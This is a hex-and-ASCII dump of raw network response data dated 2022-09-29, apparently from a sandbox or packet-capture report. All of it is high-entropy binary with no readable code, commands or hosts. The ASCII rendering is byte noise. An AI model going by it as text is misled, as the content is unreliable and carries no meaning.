                                                                                                                                                2022-09-29 12:51:45 UTC19785INData Raw: 43 37 5a 2d bb b5 29 43 12 4c 37 f3 19 07 3b a8 0b 57 3c 95 a5 db 65 71 24 81 85 7c ea c1 b2 36 5a bd 1c d9 18 0d 2b 14 3d 3b 89 2d bf f7 f2 49 44 fc 50 6e 7f 5b be 47 cc db 01 82 e1 78 83 67 d6 0d 12 ab ba b9 80 e8 1d 67 cd 58 8c 89 eb 6d fb 35 4a be ed cd 1e ad ff 34 7c ea 9e 97 5e 7f 84 b8 0d aa 38 15 06 27 1b a8 1e 09 bd ac ad 0a 18 23 fc d0 10 d5 a4 ed 7a b1 2a 7d d1 94 9b e4 05 31 17 93 5a de d4 4f 6d 36 42 3c 31 7f 8d 33 90 e2 ba ae 79 eb 0b 6f 43 5a e5 cb d9 25 63 c6 1e 2f 6f d3 30 7c 7e b9 05 15 f5 de 82 b8 d2 24 3d 02 7a db c7 54 b0 83 49 ec 72 05 10 a1 c3 f3 ae 6b c0 90 73 a8 69 0b f3 a5 c2 c6 cf 02 69 a3 4d 0a 08 33 5a 89 92 5a 76 f8 64 12 18 e5 20 29 bf 5c 40 6c a9 67 79 a8 ed 09 a3 68 69 ea b5 96 da 28 3f 15 f1 da c7 99 3a 67 fb b5 96 36 65
                                                                                                                                                Data Ascii: C7Z-)CL7;W<eq$|6Z+=;-IDPn[GxggXm5J4|^8'#z*}1ZOm6B<13yoCZ%c/o0|~$=zTIrksiiM3ZZvd )\@lgyhi(?:g6e
                                                                                                                                                2022-09-29 12:51:45 UTC19801INData Raw: 85 d4 53 39 d6 67 b1 ac 1e b3 ab 18 61 7b 44 0b cf 66 7f da 43 65 e2 69 c9 fe 3e b5 63 71 e9 cc ef 1e 75 25 e0 8f ac 68 d4 4d 67 8c 06 1d 29 1f be c2 9f c4 12 72 45 c9 ca 7a ca f4 eb ed 03 56 3a 67 04 52 ee 7b ce f1 65 4f b1 06 3d 86 51 90 62 8f 1b 79 96 b5 95 60 46 28 8a f7 7e bb c7 1b 68 b3 96 8e f3 bf 1b 24 83 ba 26 74 b9 95 ed ed 94 f3 0d 4d 2b 04 87 20 68 21 58 c6 9e f6 9e 94 b2 2a 46 c3 d6 27 0e e3 f8 b7 70 4b 71 e1 db 08 39 c8 e8 1c be 83 19 0d c4 0c 15 29 ef 98 5a cd 12 4b 52 a0 b8 d7 96 ed ee f0 50 18 c5 16 31 d4 6e 03 aa b4 60 9e 08 17 dd 6b f3 7e 55 e3 12 20 a3 de e0 cd d8 41 90 07 96 53 03 24 ca a3 e7 81 8a db 30 41 82 ee 1b 20 e5 d3 e5 88 ed 91 36 ad e0 6e f5 68 ab 16 e7 a6 61 df 7f 4a f0 a4 94 55 fc fa 54 23 56 6e 61 ec 96 df 3b 5d e0 45 9a
                                                                                                                                                Data Ascii: S9ga{DfCei>cqu%hMg)rEzV:gR{eO=Qby`F(~h$&tM+ h!X*F'pKq9)ZKRP1n`k~U AS$0A 6nhaJUT#Vna;]E
                                                                                                                                                2022-09-29 12:51:45 UTC19817INData Raw: af 9f 9d 45 78 21 e8 6d be bb 49 b9 8e d7 7d 01 a6 d2 15 91 d8 33 88 5a a7 01 c6 de d9 91 07 e4 d3 ea dc 32 bf ad 74 94 5a ef 6d 78 b8 ea 32 7c 1c e9 3a 36 4a 15 3c d3 3e 41 2d 97 61 ab b9 02 16 a1 f3 05 27 cd b1 52 52 96 b2 44 9f b6 1e 2d 5e a8 59 da 6f 94 c5 79 a4 66 d1 a5 52 47 fe 9b 51 ce a6 5d ad 0f c7 a9 09 6f 3b 2b 9d 8c 92 d7 13 38 ba 29 db a6 d5 25 64 15 7c 7a 62 cf 5f 48 df 45 4a 88 e9 4b 45 0d 42 91 0a a3 4e 24 a5 86 6c b3 a9 4d b5 9e ea 49 99 72 70 a3 1f 72 7a d0 84 9e c9 7e ae 1e ec e1 83 cf 9a 21 6f 48 ce ac 55 dc 25 61 9e df 02 67 cf e4 72 85 6b d2 f1 6a 79 cb a5 4d da 4a 0c 48 71 57 4c 30 15 c0 17 4e 87 65 de ee c2 0c 98 ff 14 48 53 16 f7 47 87 21 ce db 07 27 d9 90 c2 42 fe 95 9e 8c 14 d8 5e 19 1f 8b 1d 98 b9 c4 bf bc db 46 48 46 c9 4c c0
                                                                                                                                                Data Ascii: Ex!mI}3Z2tZmx2|:6J<>A-a'RRD-^YoyfRGQ]o;+8)%d|zb_HEJKEBN$lMIrprz~!oHU%agrkjyMJHqWL0NeHSG!'B^FHFL
                                                                                                                                                2022-09-29 12:51:45 UTC19833INData Raw: 23 01 34 0b f4 7d e0 04 ff ea c7 b0 23 68 06 42 6f 56 15 6c 7d 48 4e 15 a6 bb 85 df 08 36 a4 b3 7a 5a 57 41 6c c6 c5 ff 8e 03 18 41 66 b7 4a 7c 6a 9c 8d 8b e0 26 be 67 a8 ba 29 23 d2 e8 ea 9e e7 93 7b 59 f5 a9 5a 67 9e 70 30 cc 1e 6a e0 a3 cf 62 10 6b aa 37 16 4e a2 7a ac 03 9c de 2a a6 73 aa 63 cb 55 a8 c5 be 8b f0 39 ca 56 68 44 b1 ee f1 93 63 af fb 77 7c ff 13 99 85 35 21 80 c8 00 d7 35 41 50 90 5e ef 16 e5 0e ae 8b 4b c3 e7 8f 7b 7a da 0b 69 87 08 e3 a5 83 37 db cb b2 cd 5e 72 ea 20 d6 a0 59 1d 01 b8 7d 3d 86 ce ca 8b f2 a7 e5 e9 66 78 00 ea 2b 43 f8 64 c3 ce 2d cc 92 d3 50 31 fd be 15 33 60 40 36 ec f3 c3 fb 61 de bf 79 04 eb b0 a1 34 ad a1 2c 43 51 fd a7 19 85 12 22 ac 60 5b c2 86 2b 5d 54 bf c0 6a 44 20 41 13 b3 f2 77 cb 2e 35 b4 08 bb c6 bc 3e e8
                                                                                                                                                Data Ascii: #4}#hBoVl}HN6zZWAlAfJ|j&g)#{YZgp0jbk7Nz*scU9VhDcw|5!5AP^K{zi7^r Y}=fx+Cd-P13`@6ay4,CQ"`[+]TjD Aw.5>
                                                                                                                                                2022-09-29 12:51:45 UTC19849INData Raw: ce 26 d4 7b c6 c0 c6 df 46 ff af c0 14 87 48 22 61 8b b1 54 ec e1 a4 53 b7 43 c6 e8 0e 41 cf ec 30 14 8a 3f ba 1a 34 68 db 11 84 07 75 6f b2 5f 19 3f 41 49 7b e8 a1 45 b4 c4 84 61 cd 98 aa c4 e9 25 4a dc 95 53 f6 f6 fb 96 5d 2f ea 5f 04 c5 04 a1 5b fa 34 f3 64 bd a6 86 6d 34 00 cc 69 4e 51 f6 a0 5f 53 44 b1 c6 bb f1 55 01 35 ef 7a 1a 07 df 2b 92 00 d3 61 7d ca f6 ea 79 7b e7 1b 6e a3 99 88 ef dd 61 4e 94 a3 60 b9 0c 5f d5 da 70 34 44 d0 03 96 63 c4 1f cb 92 e0 cf a8 b3 62 de 2e 94 c9 f8 6e 93 dc 1f f8 7f de 3e 80 e0 56 91 37 b9 bb fc 36 63 dd 77 be c1 d3 56 a8 9f a9 05 7a 47 56 0e 94 8b 57 c7 ba 84 8b 0e 60 43 7d 42 3b c5 91 5c 89 0e ea 8d 85 4f 9d 62 f5 8f 2d bf 82 13 81 31 d8 29 84 0d 99 50 71 e1 30 9c 66 ab 57 f4 54 82 98 0d e5 a4 0f b3 13 05 1d 5a 28
                                                                                                                                                Data Ascii: &{FH"aTSCA0?4huo_?AI{Ea%JS]/_[4dm4iNQ_SDU5z+a}y{naN`_p4Dcb.n>V76cwVzGVW`C}B;\Ob-1)Pq0fWTZ(
                                                                                                                                                2022-09-29 12:51:45 UTC19865INData Raw: 3f 0c d4 80 d6 45 e4 41 bd ba 8d 76 2c af 5c ee b5 00 5f 9a e2 51 9e 7d 39 fc 54 ac 13 f1 bc 1e 1c b4 ee 3a 05 55 eb 0d 41 f2 b5 89 02 88 66 04 ea 62 6a 5f a4 62 da 7b c4 52 02 8f 9e 53 19 33 e7 31 24 6f c3 25 2c 95 8f ea ee 75 c0 06 0b e4 de 5d 90 a4 14 a4 6d 0f 47 f4 75 54 91 d6 26 cc 32 62 ed bb 7a 44 2f d2 2c fd 1c 8f a5 c1 0a eb 61 bb 6f 94 54 c5 87 df f1 c7 a3 b1 11 72 85 f2 04 9c 0b e7 61 23 80 c7 b4 03 e7 92 64 e6 59 00 c0 a1 09 03 8c 3b c3 e3 bb 99 0e 6f b8 70 3a e1 e7 02 8c 73 65 65 fb 3d 71 8b fa c6 2e 98 b1 87 0a 99 e2 43 f8 87 76 ee c1 87 9c c2 27 1b 17 30 0d e9 ff 4a 74 69 36 dd 95 37 b6 86 be 00 40 17 fb af 34 6f cc cc 29 ef 52 65 b3 df 22 02 10 d3 f7 7c 61 89 88 8c 2f 42 2f 53 01 72 2b 00 4c 21 aa c2 67 5b 93 e0 d4 10 cb 0b 48 a7 e3 54 53
                                                                                                                                                Data Ascii: ?EAv,\_Q}9T:UAfbj_b{RS31$o%,u]mGuT&2bzD/,aoTra#dY;op:see=q.Cv'0Jti67@4o)Re"|a/B/Sr+L!g[HTS
                                                                                                                                                2022-09-29 12:51:45 UTC19881INData Raw: 3c 6f 5d 86 96 49 e6 03 09 5b 09 35 48 76 e1 0c 65 2d 8c a3 a2 09 16 33 f8 d4 ae 91 b2 32 0c 28 84 06 e1 d8 dc 8d b5 19 dd c0 9c 2a 42 63 be 22 36 ad c2 f0 21 f7 50 49 a0 26 81 00 2d 7b 61 5f 5f dc e7 80 a2 5b 3b b3 71 12 55 ad 1f 03 75 1a ad a0 0a 66 65 68 d0 62 dc c2 57 a8 81 4b 21 31 7d cb 03 71 06 6f 74 b9 ff f7 0a dc 45 f4 af dd 3c d8 ea b3 4f 66 36 96 3f dd 58 0b 3d ac c6 44 e6 6e 1d 52 69 e7 2e 71 cd 4a 0f 8e 0d 03 0a 49 5a 03 10 2c 3d b5 66 3b a2 c9 bf 73 76 ca 1e d0 0e b1 41 65 05 87 94 be 20 5b 60 e3 17 41 28 53 38 18 a1 6a cc ce fd fa 88 b5 18 39 a5 07 22 73 03 21 de 02 0a 55 d0 78 24 bb 5e 91 8f 2a 84 f9 a0 49 57 66 6c fe d9 85 9b 5f d3 61 7c aa ef 7f 26 33 ff 69 26 9c 58 a1 9b 8c 87 c7 38 2d b6 22 1e dd 49 f7 11 ec fe 70 0d 44 b3 4a ae f7 0d
                                                                                                                                                Data Ascii: <o]I[5Hve-32(*Bc"6!PI&-{a__[;qUufehbWK!1}qotE<Of6?X=DnRi.qJIZ,=f;svAe [`A(S8j9"s!Ux$^*IWfl_a|&3i&X8-"IpDJ
                                                                                                                                                2022-09-29 12:51:45 UTC19897INData Raw: 3a 1a 5e 2e 38 35 69 ab e9 57 fa 0f a2 ae 4e f9 23 5a 3d 4a 1b c3 ac 47 2a 05 24 64 75 54 16 d8 6c 5a 77 4c 05 ae af 8e 59 6a 2e 6c df 59 a8 5a 5b af 38 1c 93 57 8d 91 6c 8f 8e 0c 70 eb ab 7e e1 7c 20 98 f9 3a 6f 2d 52 5e 31 77 d7 57 0f 24 7f b2 20 84 e9 02 b7 42 f3 85 6d ef 3f 26 d5 92 6a 4b 24 96 35 64 84 1d a9 a8 7c a8 dc a1 be 02 22 19 c8 22 48 6c 1b 90 89 eb 0e 9b 14 47 79 b3 a9 aa b8 ee 29 0d fe e4 16 58 79 e7 69 59 08 73 c6 5e 6c ec e9 62 e3 ce 5c f0 38 6e f8 de c3 37 a0 0d 65 ca fb ea 94 4b a2 ea 23 35 c3 00 a3 fa 0b 66 aa 88 28 16 51 59 35 40 6c a7 9a 48 d3 51 47 63 e0 11 ad 45 af 81 3e 8c 15 81 72 85 e4 08 e6 9c 49 5d bb 4d a4 e5 dc 7a 11 14 ff 51 38 40 3e aa b5 5c 0e 40 c7 4a df bd 3e e6 06 b5 1d d9 91 65 b4 02 a2 35 f2 11 a8 8e 0e 6b ef 3e c0
                                                                                                                                                Data Ascii: :^.85iWN#Z=JG*$duTlZwLYj.lYZ[8Wlp~| :o-R^1wW$ Bm?&jK$5d|""HlGy)XyiYs^lb\8n7eK#5f(QY5@lHQGcE>rI]MzQ8@>\@J>e5k>
                                                                                                                                                2022-09-29 12:51:45 UTC19913INData Raw: 41 86 f3 e5 90 4d a4 29 91 53 b6 4f 6a dc 55 85 c2 0f 1c 63 1d 13 75 b2 e1 67 dd 92 a6 9e 14 05 7f b1 57 e1 3c 3f ff a6 d2 8c d0 b2 6d 67 5e 6e b5 ed de dd 4a 09 99 e6 52 79 07 5a ff 53 07 08 86 14 2c b0 37 72 05 52 0d ab 3b 0e 83 4d 20 02 35 22 37 93 29 05 ce e1 58 1d b3 ec ff c9 f9 66 03 46 90 07 b3 a3 7c a1 4f fe 3f 2e 32 b5 26 b5 18 cc 48 1a ea ec 51 63 97 74 b1 7a 93 5a 11 f6 36 6b de 87 df f4 f1 43 12 c1 6d 61 cc 6f 23 76 e6 cc 44 4c bf be 6d fd 45 ee 04 05 9b 72 fd ac b8 19 47 12 5c cd 6c 91 e9 05 d5 ea 77 40 ac e2 74 f0 b5 5b bc b2 70 a6 b1 8e 17 96 73 49 34 28 1f 2e cb 2b 12 65 ac 8c 64 c0 30 c2 4e ba 04 90 c9 cf af 35 77 db 13 56 20 91 e5 11 3a f4 56 e6 f5 6c 17 37 82 7c 87 d1 fd e4 dc 38 5d c8 84 ad a1 19 82 b3 3f 31 c0 35 fa 5b af ec 50 59 5a
                                                                                                                                                Data Ascii: AM)SOjUcugW<?mg^nJRyZS,7rR;M 5"7)XfF|O?.2&HQctzZ6kCmao#vDLmErG\lw@t[psI4(.+ed0N5wV :Vl7|8]?15[PYZ
                                                                                                                                                2022-09-29 12:51:45 UTC19929INData Raw: 9f 04 f6 d0 61 58 3a f3 57 24 ff 93 87 17 d3 13 37 13 e0 28 af dc f9 96 8c 87 88 78 6d 66 51 08 14 59 3d cc 53 6b 08 16 38 c5 ae c4 16 a0 b2 b0 06 37 50 8b e5 61 f1 81 05 a0 ec 5e 69 6f 32 20 ee cc 1c 33 7b 80 2e 1d bc 7e 82 ea 6d d6 41 47 2d 4b 9f 6f 52 b5 fa 09 02 d0 f1 d8 d0 d8 10 b5 cd a0 36 d9 dc 3a 0b 91 b1 fd 05 2b a0 16 72 34 f9 78 cb 4d e0 25 aa 4f 27 24 4a fd e8 a1 eb 92 54 a2 05 ae 4b 84 9d 15 91 72 ab 4b d0 bc ad 5b cd db bf 83 ee 47 b0 f1 a5 41 b0 b5 9b 63 a4 08 fb 3e 3c 5b b5 65 42 5c d3 f5 74 05 5a 30 a5 90 e6 91 4b 83 2b fd eb 1c 46 ed 56 88 b1 30 83 e4 a9 97 7c 62 db e4 2c 8f 60 99 7f 58 f6 f6 71 cc 0f ea 00 6a 8d aa c4 74 62 c3 99 c8 8e 74 6c 73 46 c2 73 92 a8 41 08 1d 00 1f 6e 24 2d 68 b2 60 36 a2 04 4b 17 d6 e0 9f be b5 a5 fc 6c 59 0e
                                                                                                                                                Data Ascii: aX:W$7(xmfQY=Sk87Pa^io2 3{.~mAG-KoR6:+r4xM%O'$JTKrK[GAc><[eB\tZ0K+FV0|b,`XqjtbtlsFsAn$-h`6KlY
                                                                                                                                                2022-09-29 12:51:45 UTC19945INData Raw: fd ed 6f f6 07 3c 05 4a 99 98 06 2c a2 a3 be 16 f9 6e fd c3 56 38 b4 7d ad 91 94 36 fd ff a2 58 8d 55 be 57 28 a9 db 8a 37 f4 62 3e 9b 82 0c ff 37 84 0f e3 18 7c aa 8d e6 2d a6 b1 b7 66 7d 85 10 ff 55 80 52 ad ac 36 be b6 fe 91 07 0d 5a 00 4d 7b 9b c1 63 30 16 73 f7 f1 cc 46 65 0c fc ba 6e 69 b4 11 7f 6e fe 49 77 14 c4 18 8f 11 5c 3e 5e 40 21 52 d4 7e 57 6b b7 54 7d 33 19 38 10 91 83 17 29 ed 7a fe 8c fd e0 8a 67 94 e0 0e 20 ba c0 2b e9 98 14 08 b8 da ee b3 e8 dc 17 67 7c 53 06 65 22 77 c2 95 fc f8 94 3c f9 80 05 7d 45 9b ae 92 a9 7c 6a 85 62 50 2b 64 bc f9 76 40 24 69 03 7e 98 45 ef bb dc f4 ac b5 81 51 68 1f 0e 82 ad bb 8d b8 16 49 ea 69 ac 9b 9c 65 56 83 8c 54 ee 2a d0 27 a2 dd 88 4e 7c 61 37 99 5e 58 7e 64 a5 7d 60 e7 3e d4 b2 4a 29 77 87 6b 98 c9 d3
                                                                                                                                                Data Ascii: o<J,nV8}6XUW(7b>7|-f}UR6ZM{c0sFeninIw\>^@!R~WkT}38)zg +g|Se"w<}E|jbP+dv@$i~EQhIieVT*'N|a7^X~d}`>J)wk
                                                                                                                                                2022-09-29 12:51:45 UTC19961INData Raw: cd 90 94 62 e6 d1 dd 99 76 23 4e 43 ee 66 c0 9a d6 e4 b9 62 4e 4c 11 a9 e4 d7 2d ee 74 d1 ad bd e3 29 3d 90 31 48 50 13 98 04 06 ff a5 84 c9 25 05 92 64 08 58 ba 66 f3 b8 05 0f b1 24 4a 93 80 10 0d 87 d9 46 22 cc e9 87 15 4a 64 3e e4 cf 37 de e1 f6 f0 03 c0 10 ba 83 e7 2e 91 ba b6 8f 49 cc 3f fb 30 d3 59 71 24 5f bb c0 76 54 2b 84 c5 41 aa 4b 8b 2f c8 5f ad ac c5 fb 9c f5 2e 75 74 47 cd d5 33 20 1e 81 a2 e5 55 a9 27 a0 45 46 53 50 7f ce 04 c5 7f 82 8c 71 77 ca cd 8c e6 3e ba 52 ea 78 66 8b db 71 4d ea fe d6 be 6b 54 e5 43 de c7 58 12 dc c5 71 3d 45 5a 5d 90 67 6b 7d 82 28 ac 01 fe ac 2b 27 d3 bb be 78 0d 84 31 57 4c 2a aa 29 2b ee 70 1a 57 70 8b 58 76 6e f3 63 b2 0f 3f 68 d2 76 4c d8 34 d1 0d 62 ef e8 b7 da 77 55 f7 18 ef 78 c5 92 c1 77 e2 c8 cc fe 91 0f
                                                                                                                                                Data Ascii: bv#NCfbNL-t)=1HP%dXf$JF"Jd>7.I?0Yq$_vT+AK/_.utG3 U'EFSPqw>RxfqMkTCXq=EZ]gk}(+'x1WL*)+pWpXvnc?hvL4bwUxw
                                                                                                                                                2022-09-29 12:51:45 UTC19977INData Raw: 9f e1 f6 53 0f 56 33 36 16 d0 f8 32 b7 81 6a 48 30 31 21 60 bb 1d 2d 2b 02 be 81 91 c4 58 06 0d c0 ed df cd de d6 66 12 3e f3 d7 91 08 a4 c0 c4 8a 81 aa 52 98 6f d1 1b 78 7a cd c3 85 1f 43 a2 f9 ec d4 ad 2a 89 56 a2 65 21 49 03 5b 31 f5 00 2d 85 69 9b db 5a ab d3 c7 27 e2 26 b4 e8 5e 84 92 63 f2 26 1f 93 69 e4 d8 23 c9 55 6f a0 de a6 b3 04 ad 42 d2 1e 98 64 06 dc 91 b1 1a a4 a8 4d 3e f0 08 01 b5 da c6 10 f6 b4 29 1f 0f 3e 92 68 2c 26 4b e8 ef a9 af 4d 6f 98 bc 57 50 44 a4 98 90 61 c7 f7 c5 16 8b d7 4c 7b 1c 3d 6a d3 48 d5 f4 6c a4 c6 90 00 77 d5 ca d8 a8 5f 87 9e f4 69 59 4e 39 34 71 31 6a b9 15 f4 31 75 bf 6f c8 fe ce 11 08 20 7b 5d 98 72 58 42 4f 93 00 9a dd 8a 9f eb f9 73 a3 54 a0 ee ab f5 8d 68 ef 2e 51 c7 35 7d f0 57 96 e9 ce 3f a6 db de 54 ca 9e 45
                                                                                                                                                Data Ascii: SV362jH01!`-+Xf>RoxzC*Ve!I[1-iZ'&^c&i#UoBdM>)>h,&KMoWPDaL{=jHlw_iYN94q1j1uo {]rXBOsTh.Q5}W?TE
                                                                                                                                                2022-09-29 12:51:45 UTC19993INData Raw: 7e 5a 74 e8 b2 ec e2 ba 7c ca 53 db 17 56 2d 63 0b ec d7 b0 b8 b8 96 be 13 8d 35 2b 12 9e f0 99 12 0b 6d 0b f9 0a 51 ed 03 06 34 c1 1a e0 e7 58 90 60 c1 a5 f8 c5 94 3b 3b 3b 0b 24 2e 71 69 ba ed 4b df c1 3a e0 6f 78 6a 19 2c fe 58 d1 19 dd 7b 62 3d c9 58 f0 a1 ed e1 8a 00 7f c0 d8 48 99 9b 1e bf f5 54 4e 61 93 bc 52 e3 b6 50 62 86 4a 3e d4 4b 9a dc 4c cb 22 d7 a2 df f8 29 ff ac 6c f5 7c 27 4d 3b 72 53 28 f0 09 b4 cf 20 a6 92 26 af 57 ef 70 82 10 bc e1 e2 9d 19 7e 6f 01 22 fe 0d 20 22 ac 67 3c 8a 97 7d 1a 90 0d 8d 02 fe d1 2f 23 b5 32 0d eb ea fc bd 1c 8d e7 13 1f 92 f0 8b 4f 97 e6 35 06 ea 24 a7 0e 38 c9 5f 67 6d dd 7d 1a 4a 74 b4 d2 f9 87 2e 08 e8 c1 9e f8 e2 f0 be 90 6e f9 9d 7d 65 f7 0e a6 f3 5d a2 2f d9 61 7c df 05 cf 84 71 98 ee 46 04 41 39 9d d9 53
                                                                                                                                                Data Ascii: ~Zt|SV-c5+mQ4X`;;;$.qiK:oxj,X{b=XHTNaRPbJ>KL")l|'M;rS( &Wp~o" "g<}/#2O5$8_gm}Jt.n}e]/a|qFA9S
                                                                                                                                                2022-09-29 12:51:45 UTC20009INData Raw: 6b f5 a1 dd 36 10 46 cd ee 06 04 37 d6 92 a6 e7 e9 3d d8 d2 70 bf e5 6b 7d 15 5c f1 74 17 cb a0 aa 14 ff b0 1c 25 7e 77 24 c1 2b 61 20 0e 70 4d 63 ea bd bf 6f ab 18 32 e4 f1 9e 99 e1 c7 64 99 ef 5c f6 46 d3 8a 11 e7 4d a3 12 c4 cf dd 32 d6 e4 e9 16 92 68 36 f9 56 34 36 f4 0a 66 de 8f 13 cd 0e 29 d7 e6 81 58 53 35 7f 18 23 d4 9c 5f a6 75 5e 3d d3 4e b5 78 26 d5 6f de fc 31 2a cc 5b a4 4a fd c5 a3 00 36 05 e4 dd 66 55 a1 42 20 e3 3b c6 4c 7a 63 92 99 21 08 db d5 cb 35 15 0d d0 51 14 f6 26 fa 71 85 f9 69 53 4a 31 35 ff 22 15 f9 83 65 35 47 be 18 25 fa 9b bb 07 a1 9b a1 f7 32 f3 7d 18 24 6b d8 41 5f 60 9e e2 c6 d6 61 9c 07 7a 80 69 28 7c d5 55 bf fe 32 55 f8 86 af 32 3e ea 2e a6 22 2b 8e 24 54 5b b5 20 85 4c 8c 96 a0 9f e7 94 f2 0d 7e eb f5 0a 77 e4 75 4a cb
                                                                                                                                                Data Ascii: k6F7=pk}\t%~w$+a pMco2d\FM2h6V46f)XS5#_u^=Nx&o1*[J6fUB ;Lzc!5Q&qiSJ15"e5G%2}$kA_`azi(|U2U2>."+$T[ L~wuJ
                                                                                                                                                2022-09-29 12:51:45 UTC20025INData Raw: c1 d1 a8 40 24 97 ae 5e 0f 5f 68 34 6f 36 69 2c ca 14 66 bc 66 6d 11 c8 b5 5c 69 b1 61 14 0b 59 ce 2a 75 5f 3b 98 c5 7c 5d 37 f9 bf 95 03 10 45 3c 54 06 fe 36 5f 84 c8 ad 43 aa fd 80 14 cc d6 db 8b 97 c6 20 5f 5d fd 67 34 e6 2e 7f ff f3 51 8f 51 37 06 6e 19 38 30 10 66 78 f3 3a 85 d9 1c 39 bc ce 80 c8 ed a4 1e e3 b1 19 d0 05 a0 50 3c 39 bc 84 d2 f2 b5 fd ea 07 d0 55 a9 54 96 fd e2 e2 0a 57 b7 35 c1 16 54 a2 5d 21 bd cc 60 8e 15 4d 6f 26 b5 3c 2e 50 a9 31 c7 58 c7 67 36 7a 19 fa 67 4c 8f 02 b2 a9 d5 ab 5c 67 8a 6b 4c ab ff 10 6b 60 6b 9c 83 d1 23 c7 d4 90 d1 8e ea dc 21 20 14 1f 96 6f ee a1 6f 3f 40 81 5e 96 b3 9e 58 ce c2 96 ce 4a 60 82 79 12 90 d5 27 ed 8e 08 c8 bc df 52 15 72 a0 d4 ad ff 11 f1 36 d6 1a 84 1c 93 c7 8f be 8e 46 06 01 98 8f b8 7e a6 6a e4
                                                                                                                                                Data Ascii: @$^_h4o6i,ffm\iaY*u_;|]7E<T6_C _]g4.QQ7n80fx:9P<9UTW5T]!`Mo&<.P1Xg6zgL\gkLk`k#! oo?@^XJ`y'Rr6F~j
                                                                                                                                                2022-09-29 12:51:45 UTC20041INData Raw: a2 92 18 a3 0e 4f 2e 0f 93 fd 7c 6a 30 68 9c 85 3d 72 65 db 3b a3 a0 f6 a0 59 18 51 ff dd 12 9a 66 98 10 84 fd 9b 68 d9 b5 a4 4f 5b de 2d 25 0e 4e a2 c7 e3 19 80 7b 80 f9 64 fa 41 db 51 59 e5 3c be f2 8b ce 5d fa 71 01 ca 85 79 84 1e 39 dc e0 32 bd e2 a2 53 02 9f 70 bd d1 73 e4 ce 7d 50 98 b0 ee 30 f6 3e 9c 79 33 4e e1 df 47 60 89 06 f0 5e 16 b0 32 18 d8 7c 9a 67 bc 5c 54 a8 34 44 73 56 6a 4f fc 32 d9 de 76 cf 30 98 e3 88 f4 7a 93 6b 90 cf a3 a8 74 66 4c 66 a6 61 af ba 73 a5 da 4d 04 7d 93 4a 6e 16 ce a1 64 3a 6f 79 c8 a9 b5 13 04 e5 3c af 1a b8 e3 ae 63 a3 c2 d5 8e f6 53 19 88 c1 51 6d e4 f2 b6 e3 6e 8f 66 8b 30 40 05 25 09 2b 17 aa 3e 51 85 44 e4 a9 36 d3 4e 17 22 de 69 02 06 e6 62 bd 22 23 49 d7 c6 98 e1 9a 86 90 2f 9d 4f 88 0c 20 69 2c bc c5 10 67 fd
                                                                                                                                                Data Ascii: O.|j0h=re;YQfhO[-%N{dAQY<]qy92Sps}P0>y3NG`^2|g\T4DsVjO2v0zktfLfasM}Jnd:oy<cSQmnf0@%+>QD6N"ib"#I/O i,g
                                                                                                                                                2022-09-29 12:51:45 UTC20057INData Raw: c7 c6 27 84 9a 03 36 ba 74 0a ee 51 df c2 e0 a2 f6 47 31 68 14 44 6d d8 c1 0d 4b c9 90 79 e5 04 53 0f 66 6c 23 13 e2 82 97 de 67 b3 be 99 99 81 b6 ad 17 56 98 70 a2 1b e9 fd 95 2f c5 cc 5f bc 65 40 65 dd b3 9b b9 02 94 1e 37 3f b4 a9 a8 7a f4 87 01 9c f7 d4 a1 84 66 6d 85 7e ad 91 b4 d4 8a cc 42 64 7f 2e 2b ba 1c d6 28 3a 85 e9 85 4f d2 2c 82 5b 00 19 5d 10 be 3c 25 8d b0 e4 df cc 1e a1 a1 ad c6 b8 9f 1e ce 50 07 8d 12 4d 5c b0 2f ae 20 28 d1 4c 0b 21 8a bb 7a 2a 5a 25 32 7a 46 79 04 87 67 ae 76 26 71 1b fc be 80 80 d9 fd f3 23 8b e8 3a a4 a8 9c 3d 17 07 62 b2 c1 df 51 5c 6f bc ec 42 00 be ff 68 25 5f bf e1 07 a9 f6 e1 05 68 b4 e2 e4 71 19 16 1d d0 ff 27 0f d3 9f ff 7f 4d 15 dd da 3c 2c 34 8c d8 43 e8 b8 3c c0 14 4b e7 f5 64 e3 65 a2 81 51 2c 29 06 e4 9a
                                                                                                                                                Data Ascii: '6tQG1hDmKySfl#gVp/_e@e7?zfm~Bd.+(:O,[]<%PM\/ (L!z*Z%2zFygv&q#:=bQ\oBh%_hq'M<,4C<KdeQ,)
                                                                                                                                                2022-09-29 12:51:45 UTC20073INData Raw: 68 5c ef c3 12 00 6a 36 95 61 93 67 40 88 3c 2e 5f 67 7d 69 33 ed 46 7c e6 b3 21 fd 5a 2f 07 8b 55 41 e0 ff 20 cd 9d fa ec 89 24 94 3c 00 32 f0 47 26 fd b2 25 ef 8e ca ac 26 fa f9 48 eb 48 1f a6 2d ab 3e ae e5 9e fc cd 35 81 ac d3 55 7a c7 36 9c 15 12 eb fb 04 8b f1 af af 70 79 45 d0 45 ce 0e 28 91 a5 8e 49 a8 bb 95 69 3f 92 09 2c 02 de 14 8b a9 5b d8 77 0a 23 65 bf ee f8 27 0b 8e ff cc 51 2f 81 4b f0 a1 ca 4a 19 0e 7d 5a d6 34 33 a6 a4 22 23 06 9e 5d 30 94 76 04 df ac a7 6a bf ae aa 83 c8 34 11 6e 51 60 34 d5 a1 62 73 0a de e7 09 ef e2 6e 37 ea c8 eb f8 f2 3a b1 6c bd 69 22 b0 fe 57 f6 84 3d 2b 82 17 bd f0 46 d1 f2 db 6e 98 a2 16 0b 8a 1f dc 6c e6 25 08 0c fb 7d 4d 50 38 20 d5 f0 15 5a bc 52 f8 cc 37 f3 aa bb 89 8f f1 1a 0d a3 39 3c be 88 ac 29 c2 79 46
                                                                                                                                                Data Ascii: h\j6ag@<._g}i3F|!Z/UA $<2G&%&HH->5Uz6pyEE(Ii?,[w#e'Q/KJ}Z43"#]0vj4nQ`4bsn7:li"W=+Fnl%}MP8 ZR79<)yF
